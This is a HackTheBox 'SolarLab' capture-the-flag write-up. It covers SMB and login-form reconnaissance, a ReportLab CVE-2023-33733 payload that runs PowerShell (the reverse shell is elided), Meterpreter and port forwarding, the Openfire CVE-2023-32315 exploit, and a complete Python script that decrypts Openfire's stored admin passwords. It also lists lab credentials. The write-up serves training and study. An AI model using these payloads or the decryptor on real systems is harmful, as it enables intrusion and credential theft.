hackthebox - Solarlab writeup

Published: 2024-07-06 · Views: 71 · Likes: 0



recon

nmap

sudo nmap -T4 --min-rate 5000 -sVCS -p80,139,135,445,6791 -oA nmap/tcp_port 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-06 14:20 CST
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.37s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-06T06:21:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.38 seconds

Add the domains to /etc/hosts:

sudo bash -c 'echo "10.10.11.16 solarlab.htb report.solarlab.htb" |tee -a /etc/hosts'

web

http://solarlab.htb/
http://report.solarlab.htb:6791/login

foothold

smb-445

Connect to SMB (port 445) as the anonymous user (null session).

smbclient

smbmap


netexec


Download the xlsx file from the share:

Find the passwords in the spreadsheet:

web-6791

Find a valid username through the login form:

Check the usernames blake.byte and blakeB:

Yes, blakeB is a valid user.

blakeB:ThisCanB3typedeasily1@

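The username step above works because the spreadsheet gives a person's name in one format (blake.byte) while the report application expects another (blakeB). The following is an added example, not code from the original writeup: it derives the usual corporate username formats from a full name and drives an oracle that reports whether a username exists. The oracle here is a constructed stand-in; in a real run it would be an HTTP request to http://report.solarlab.htb:6791/login comparing the response for a nonexistent user with the response for a real one. The error strings in the stand-in are assumptions, not the application's actual messages.

```python
"""Derive login username candidates from a full name and test them.

Added example, not from the original writeup. The oracle is constructed.
"""
from typing import Callable, Iterable


def username_candidates(full_name: str) -> list:
    """Common username formats derived from 'First Last'.

    Ordered from most to least common; duplicates removed, order kept.
    The 'firstL' form (blakeB) is the one the report app accepted.
    """
    parts = full_name.strip().split()
    if len(parts) < 2:
        return [parts[0].lower()] if parts else []
    first, last = parts[0].lower(), parts[-1].lower()
    forms = [
        f"{first}.{last}",            # blake.byte  (e-mail style, as in the xlsx)
        f"{first}{last[0].upper()}",  # blakeB      (the format SolarLab's app used)
        f"{first}{last[0]}",          # blakeb
        f"{first[0]}{last}",          # bbyte
        f"{first}_{last}",            # blake_byte
        f"{first}{last}",             # blakebyte
        f"{last}{first[0]}",          # byteb
        f"{last}.{first}",            # byte.blake
        first,                        # blake
    ]
    seen, out = set(), []
    for u in forms:
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def find_valid_user(full_name: str, user_exists: Callable[[str], bool]):
    """Return the first candidate the oracle accepts, or None."""
    for cand in username_candidates(full_name):
        if user_exists(cand):
            return cand
    return None


def fake_login_oracle(valid_users: Iterable[str]) -> Callable[[str], bool]:
    """Constructed stand-in for the login form (assumption, not the real app).

    Models an application whose error text differs for unknown users
    ("User not found") and for known users with a wrong password
    ("Invalid password"); only the second confirms the account exists.
    The comparison is case-insensitive, as Windows-backed logins usually are.
    """
    valid = {u.lower() for u in valid_users}

    def probe(username: str) -> bool:
        body = "Invalid password" if username.lower() in valid else "User not found"
        return "User not found" not in body   # a different error means the user exists

    return probe


if __name__ == "__main__":
    oracle = fake_login_oracle(["BlakeB"])
    print(username_candidates("Blake Byte"))
    print("valid:", find_valid_user("Blake Byte", oracle))
```

To use it against the real target, replace fake_login_oracle with a function that posts each candidate with a dummy password and returns True when the response differs from the one for a name that certainly does not exist.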

PDF generated


PDF file:

The document is generated with the ReportLab PDF library:

exploit

CVE-2023-33733

| https://github.com/c53elyas/CVE-2023-33733

PoC (the base64-encoded PowerShell reverse shell is elided):

<para>
  <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e <base64 payload>') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
    exploit
  </font>
</para>

Put the payload in the Training Request text field and submit it:

get shell

user:blakeB


capture the user flag:


shell spawn

Create shell.exe:

upload shell.exe


Get a Meterpreter session:

getprivs


Find the openfire user:

Find the Openfire service:

Find the port the Openfire service listens on:

port forward

Open a reverse port forward (attacker machine):

Forward the local port to the remote port (victim machine):

web-openfire:


exploit-web-openfire

| https://github.com/miko550/CVE-2023-32315


Log in to Openfire with the credentials created by the exploit:

Lateral movement

Upload the exploit plugin jar; the plugin's password is 123:

The management tool is reached from the admin console home page: Server -> Server Settings -> Management tools.

In the drop-down, select system command:

get-shell

user:openfire

Get a shell as the openfire user:

Privilege Escalation

A passwordKey is found in openfire.script (the SQL dump of Openfire's embedded HSQLDB database):

openfire_decrypt tool:
| https://github.com/c0rdis/openfire_decrypt

...
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
...
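What the openfire_decrypt tool does with those two rows, as an added example that is not the tool's code and not part of the original writeup: Openfire's org.jivesoftware.util.Blowfish wrapper hashes the passwordKey with SHA-1 and uses all 20 bytes as the Blowfish key; the hex blob in encryptedPassword is an 8-byte CBC IV followed by the ciphertext; the plaintext is the password as UTF-16BE, padded to an 8-byte boundary with bytes equal to the padding length. OPENFIRE_SCRIPT below is copied from the excerpt above. Parsing uses only the standard library; the decryption step assumes pycryptodome is installed (pip install pycryptodome).

```python
"""Parse openfire.script and decrypt encryptedPassword with the passwordKey.

Added example reproducing what openfire_decrypt does; not the tool's code.
"""
import hashlib
import re

# Copied from the openfire.script excerpt on this page.
OPENFIRE_SCRIPT = """\
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
"""

# Column order of Openfire's ofUser table; index 6 is encryptedPassword.
OFUSER_COLUMNS = ("username", "storedKey", "serverKey", "salt", "iterations",
                  "plainPassword", "encryptedPassword", "name", "email",
                  "creationDate", "modificationDate")


def split_values(values: str) -> list:
    """Split the inside of an HSQLDB VALUES(...) into str / int / None."""
    out = []
    for m in re.finditer(r"'((?:[^']|'')*)'|(NULL)|(-?\d+)", values):
        if m.group(1) is not None:
            out.append(m.group(1).replace("''", "'"))   # SQL-escaped quote
        elif m.group(2):
            out.append(None)
        else:
            out.append(int(m.group(3)))
    return out


def parse_openfire_script(text: str):
    """Return (passwordKey, {username: encryptedPassword}) from the script."""
    key, users = None, {}
    for line in text.splitlines():
        if line.startswith("INSERT INTO OFPROPERTY VALUES("):
            name, value = split_values(line[len("INSERT INTO OFPROPERTY VALUES("):])[:2]
            if name == "passwordKey":
                key = value
        elif line.startswith("INSERT INTO OFUSER VALUES("):
            row = dict(zip(OFUSER_COLUMNS,
                           split_values(line[len("INSERT INTO OFUSER VALUES("):])))
            if row.get("encryptedPassword"):
                users[row["username"]] = row["encryptedPassword"]
    return key, users


def split_iv(enc_hex: str):
    """Split the hex blob into (iv, ciphertext); Openfire drops a trailing partial block."""
    raw = bytes.fromhex(enc_hex)
    iv, body = raw[:8], raw[8:]
    return iv, body[: len(body) & ~7]


def openfire_decrypt(enc_hex: str, password_key: str) -> str:
    """Blowfish-CBC decrypt as org.jivesoftware.util.Blowfish does (needs pycryptodome)."""
    from Crypto.Cipher import Blowfish  # imported lazily so parsing works without it

    key = hashlib.sha1(password_key.encode("utf-8")).digest()   # all 20 bytes are the key
    iv, body = split_iv(enc_hex)
    pt = Blowfish.new(key, Blowfish.MODE_CBC, iv=iv).decrypt(body)
    pad = pt[-1]
    if pad > 8:            # Openfire treats an impossible pad byte as "no padding"
        pad = 0
    return pt[: len(pt) - pad].decode("utf-16-be")


def have_blowfish() -> bool:
    """True when pycryptodome's Blowfish is importable."""
    try:
        from Crypto.Cipher import Blowfish  # noqa: F401
        return True
    except ImportError:
        return False


if __name__ == "__main__":
    pw_key, accounts = parse_openfire_script(OPENFIRE_SCRIPT)
    print("passwordKey:", pw_key)
    for user, enc in accounts.items():
        print(user, "->", openfire_decrypt(enc, pw_key))
```

The sizes line up with the scheme: 112 hex characters are 56 bytes, 8 of IV and 48 of ciphertext, and a 22-character password is 44 bytes of UTF-16BE plus 4 bytes of padding. The same script works for any Openfire install whose openfire.script (or ofUser/ofProperty tables) you can read, as long as plaintext or encrypted passwords are stored rather than only the SCRAM storedKey/serverKey pair.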

Decrypting the admin's encryptedPassword with that key gives the Administrator password:

ThisPasswordShouldDo!@


get system
